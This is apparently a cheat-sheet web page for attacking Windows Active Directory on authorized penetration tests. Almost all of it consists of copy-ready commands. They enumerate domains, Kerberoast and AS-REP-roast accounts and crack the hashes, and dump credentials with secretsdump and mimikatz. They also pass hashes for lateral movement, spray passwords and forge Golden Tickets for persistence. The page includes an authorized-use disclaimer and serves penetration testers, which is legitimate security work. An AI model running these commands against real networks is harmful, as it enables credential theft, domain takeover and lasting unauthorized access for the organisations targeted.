CyberCheatsheets

Active Directory Attacks Cheat Sheet

Active Directory attack workflow: enumeration, Kerberoasting, AS-REP roasting, credential dumping, and lateral movement on authorized engagements.

Active Directory & Windowsactive-directorykerberoslateral-movementpost-exploitationwindowsUpdated 2026-06-17

Overview

Most internal pentests are won in Active Directory. The path is consistent: enumerate the domain (BloodHound), harvest credentials (roasting, dumping), then move laterally and escalate to Domain Admin. This sheet chains the standard tools—impacket, netexec, BloodHound, mimikatz, rubeus—into that workflow.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Enumeration

Sweep subnet, find domain hosts and SMB signing

nxc smb 10.10.10.0/24

Enumerate domain users with valid creds

nxc smb 10.10.10.10 -u user -p pass --users

Collect BloodHound data remotely

bloodhound-python -d corp.local -u user -p pass -ns 10.10.10.10 -c all

Find delegation misconfigurations

nxc ldap 10.10.10.10 -u user -p pass --trusted-for-delegation

Roasting (offline cracking)

Kerberoast — request TGS hashes for SPN accounts

impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.10 -request

AS-REP roast — accounts with no pre-auth required

impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.10.10.10 -no-pass

Crack Kerberoast (TGS-REP) hashes

hashcat -m 13100 kerb.hash rockyou.txt

Crack AS-REP hashes

hashcat -m 18200 asrep.hash rockyou.txt

Credential dumping

Dump SAM/LSA/NTDS secrets remotely

impacket-secretsdump corp.local/user:pass@10.10.10.10

Dump local SAM hashes

nxc smb 10.10.10.10 -u admin -p pass --sam

mimikatz: DCSync the krbtgt hash (needs replication rights)

lsadump::dcsync /domain:corp.local /user:krbtgt

mimikatz: dump credentials from LSASS memory

sekurlsa::logonpasswords

Pass-the-hash / lateral movement

Spray a hash across the subnet (PtH)

nxc smb 10.10.10.0/24 -u admin -H <NTLM> --local-auth

SYSTEM shell via PsExec with a hash

impacket-psexec corp.local/admin@10.10.10.20 -hashes :<NTLM>

WinRM shell using a hash

evil-winrm -i 10.10.10.20 -u admin -H <NTLM>

Quieter WMI-based execution

impacket-wmiexec corp.local/admin@10.10.10.20 -hashes :<NTLM>

Kerberos ticket attacks

Forge a Golden Ticket (full domain persistence)

impacket-ticketer -nthash <krbtgt-hash> -domain-sid <SID> -domain corp.local Administrator

Request and inject a TGT (overpass-the-hash)

Rubeus.exe asktgt /user:admin /rc4:<NTLM> /ptt

Pass-the-ticket with a ccache

export KRB5CCNAME=ticket.ccache; impacket-psexec -k -no-pass corp.local/admin@dc.corp.local

Quick one-liners

Find machines where you can run code

nxc smb targets.txt -u admin -p pass -x whoami

Check for SMB signing (relay candidates)

nxc smb 10.10.10.0/24 --gen-relay-list relay.txt

Password spray one password across all users

nxc smb 10.10.10.10 -u users.txt -p 'Spring2026!' --continue-on-success

Read GPP passwords from SYSVOL

nxc smb 10.10.10.10 -u user -p pass -M gpp_password

Tips

  • Run BloodHound early — it maps the shortest path to Domain Admin so you don't attack blind.
  • Kerberoasting only needs any valid domain account; it's the highest-ROI first move.
  • Watch lockout policy before password spraying — one attempt per account per window.
  • Golden/Silver tickets are persistence; only use them with explicit authorization and clean up after.

References

Aide-mémoires similaires